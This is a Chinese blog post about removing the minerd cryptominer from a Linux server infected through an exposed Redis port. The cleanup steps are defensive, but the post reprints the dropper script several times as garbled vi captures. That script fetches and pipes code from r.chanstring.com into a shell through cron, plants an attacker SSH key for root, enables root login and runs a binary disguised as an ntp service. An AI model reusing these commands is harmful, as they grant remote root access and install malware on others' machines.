linux中了minerd之后的完全清理过程(详解)
一不小心装了一个Redis服务,开了一个全网的默认端口,一开始以为这台服务器没有公网ip,结果发现之后悔之莫及啊
某天发现cpuload高的出奇,发现一个minerd进程占了大量cpu,google了一下,发现自己中招了
下面就是清理过程
第一步
1.立即停止redis服务,修改端口权限,增加密码措施
2.按照网上的资料删除crontab里的两个内容
sudorm/var/spool/cron/root
sudorm/var/spool/cron/crontabs/root
3.知己知彼,百战不殆,研究病毒的初始话文件
exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root mkdir-p/var/spool/cron/crontabs echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/crontabs/root if[!-f"/root/.ssh/KHK75NEOiq"];then mkdir-p~/.ssh rm-f~/.ssh/authorized_keys* echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot">~/.ssh/KHK75NEOiq echo"PermitRootLoginyes">>/etc/ssh/sshd_config echo"RSAAuthenticationyes">>/etc/ssh/sshd_config echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config /etc/init.d/sshdrestart "pm.sh"28L,1470C10,1-8顶端 exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spooll /cron/root mkdir-p/var/spool/cron/crontabs echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spooll /cron/crontabs/root if[!-f"/root/.ssh/KHK75NEOiq"];then mkdir-p~/.ssh rm-f~/.ssh/authorized_keys* echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITT shREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZZ 7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kvv 9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1yy 993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot">~/.ssh/KHK755 NEOiq echo"PermitRootLoginyes">>/etc/ssh/sshd_config echo"RSAAuthenticationyes">>/etc/ssh/sshd_config echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config /etc/init.d/sshdrestart 10,1-8顶端 exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/rr oot mkdir-p/var/spool/cron/crontabs echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/cc rontabs/root if[!-f"/root/.ssh/KHK75NEOiq"];then mkdir-p~/.ssh rm-f~/.ssh/authorized_keys* echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOcc 9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLL Kn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm88 gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBrr o4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot">~/.ssh/KHK75NEOiq echo"PermitRootLoginyes">>/etc/ssh/sshd_config echo"RSAAuthenticationyes">>/etc/ssh/sshd_config echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config /etc/init.d/sshdrestart fi if[!-f"/etc/init.d/ntp"];then 10,1-8顶端 exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root mkdir-p/var/spool/cron/crontabs echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/crontabs/roo ot if[!-f"/root/.ssh/KHK75NEOiq"];then mkdir-p~/.ssh rm-f~/.ssh/authorized_keys* echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yWW 8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQQ V8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXX mVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot"" >~/.ssh/KHK75NEOiq echo"PermitRootLoginyes">>/etc/ssh/sshd_config echo"RSAAuthenticationyes">>/etc/ssh/sshd_config echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config /etc/init.d/sshdrestart fi if[!-f"/etc/init.d/ntp"];then if[!-f"/etc/systemd/system/ntp.service"];then mkdir-p/opt @ 10,1-8顶端 exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root mkdir-p/var/spool/cron/crontabs echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/crontabs/root if[!-f"/root/.ssh/KHK75NEOiq"];then mkdir-p~/.ssh rm-f~/.ssh/authorized_keys* echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/AA g1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txLL 6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNyy tbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot">~/.ssh/KHK75NEOiq echo"PermitRootLoginyes">>/etc/ssh/sshd_config echo"RSAAuthenticationyes">>/etc/ssh/sshd_config echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config /etc/init.d/sshdrestart fi if[!-f"/etc/init.d/ntp"];then if[!-f"/etc/systemd/system/ntp.service"];then mkdir-p/opt curl-fsSLhttp://r.chanstring.com/v51/lady_`uname-m`-o/opt/KHK75NEOiq33&&chmod+x/opt/KHK77 5NEOiq33&&/opt/KHK75NEOiq33-Install fi fi 10,1-8顶端 exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root mkdir-p/var/spool/cron/crontabs echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/crontabs/root if[!-f"/root/.ssh/KHK75NEOiq"];then mkdir-p~/.ssh rm-f~/.ssh/authorized_keys* echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TT dRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6ww L4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdd Y7vRnrvFavroot">~/.ssh/KHK75NEOiq echo"PermitRootLoginyes">>/etc/ssh/sshd_config echo"RSAAuthenticationyes">>/etc/ssh/sshd_config echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config /etc/init.d/sshdrestart fi if[!-f"/etc/init.d/ntp"];then if[!-f"/etc/systemd/system/ntp.service"];then mkdir-p/opt curl-fsSLhttp://r.chanstring.com/v51/lady_`uname-m`-o/opt/KHK75NEOiq33&&chmod+x/opt/KHK75NEOiq33&&/opp t/KHK75NEOiq33-Install fi fi /etc/init.d/ntpstart psauxf|grep-vgrep|grep"/usr/bin/cron"|awk'{print$2}'|xargskill-9 10,1-8顶端 exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root mkdir-p/var/spool/cron/crontabs echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/crontabs/root if[!-f"/root/.ssh/KHK75NEOiq"];then mkdir-p~/.ssh rm-f~/.ssh/authorized_keys* echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYY pLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbb BXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot">~/.ssh/KHK75NEOiq echo"PermitRootLoginyes">>/etc/ssh/sshd_config echo"RSAAuthenticationyes">>/etc/ssh/sshd_config echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config /etc/init.d/sshdrestart fi if[!-f"/etc/init.d/ntp"];then if[!-f"/etc/systemd/system/ntp.service"];then mkdir-p/opt curl-fsSLhttp://r.chanstring.com/v51/lady_`uname-m`-o/opt/KHK75NEOiq33&&chmod+x/opt/KHK75NEOiq33&&/opt/KHK75NEOiq33-Instaa ll fi fi /etc/init.d/ntpstart psauxf|grep-vgrep|grep"/usr/bin/cron"|awk'{print$2}'|xargskill-9 psauxf|grep-vgrep|grep"/opt/cron"|awk'{print$2}'|xargskill-9 ~ ~ ~ ~ ~ 10,1-8全部 exportPATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root mkdir-p/var/spool/cron/crontabs echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/crontabs/root if[!-f"/root/.ssh/KHK75NEOiq"];then mkdir-p~/.ssh rm-f~/.ssh/authorized_keys* echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ77 yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y999 3qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot">~/.ssh/KHK75NEOiq echo"PermitRootLoginyes">>/etc/ssh/sshd_config echo"RSAAuthenticationyes">>/etc/ssh/sshd_config echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config /etc/init.d/sshdrestart fi if[!-f"/etc/init.d/ntp"];then if[!-f"/etc/systemd/system/ntp.service"];then mkdir-p/opt curl-fsSLhttp://r.chanstring.com/v51/lady_`uname-m`-o/opt/KHK75NEOiq33&&chmod+x/opt/KHK75NEOiq33&&/opt/KHK75NEOiq33-Install fi fi /etc/init.d/ntpstart psauxf|grep-vgrep|grep"/usr/bin/cron"|awk'{print$2}'|xargskill-9 psauxf|grep-vgrep|grep"/opt/cron"|awk'{print$2}'|xargskill-9
得到结果
1.删除crontab的配置文件,如上我们已经删除,涉及的代码
echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/root mkdir-p/var/spool/cron/crontabs echo"*/10****curl-fsSLhttp://r.chanstring.com/pm.sh?0706|sh">/var/spool/cron/crontabs/root
2.删除这个是用来免密码登陆的
rm-f~/.ssh/authorized_keys*
rm-f~/.ssh/KHK75NEOiq
你甚至可以直接把.ssh这个目录删除掉
涉及的代码
if[!-f"/root/.ssh/KHK75NEOiq"];then mkdir-p~/.ssh rm-f~/.ssh/authorized_keys* echo"ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ77 yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y999 3qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFavroot">~/.ssh/KHK75NEOiq echo"PermitRootLoginyes">>/etc/ssh/sshd_config echo"RSAAuthenticationyes">>/etc/ssh/sshd_config echo"PubkeyAuthenticationyes">>/etc/ssh/sshd_config echo"AuthorizedKeysFile.ssh/KHK75NEOiq">>/etc/ssh/sshd_config /etc/init.d/sshdrestart fi
3.删除/opt/这个目录这玩意是第四步的服务产生的
4.删除服务
servicentpstop
rm/etc/init.d/ntp
rm/usr/sbin/ntp
涉及的代码
if[!-f"/etc/init.d/ntp"];then if[!-f"/etc/systemd/system/ntp.service"];then mkdir-p/opt curl-fsSLhttp://r.chanstring.com/v51/lady_`uname-m`-o/opt/KHK75NEOiq33&&chmod+x/opt/KHK75NEOiq33&&/opt/KHK75NEOiq33-Install fi fi
如上的代码,下载了一个8M的程序,是安装了什么东西,楼主也不知道,但是接下来的代码暴露了行踪
/etc/init.d/ntpstart
这行代码启动了ntp这个服务,百度搜了下说是个时间服务,其实这玩意是病毒服务,打开这个文件,找到可执行文件/usr/sbin/ntp发现文件和那个8m的文件一个字节不差
所以删除这个文件
最后
psaux|grepminerd
kill掉所有的进程,ok修复结束
半小时之后
psaux|grepminerd
minerd进程不再出现
以上就是小编为大家带来的linux中了minerd之后的完全清理过程(详解)全部内容了,希望大家多多支持毛票票~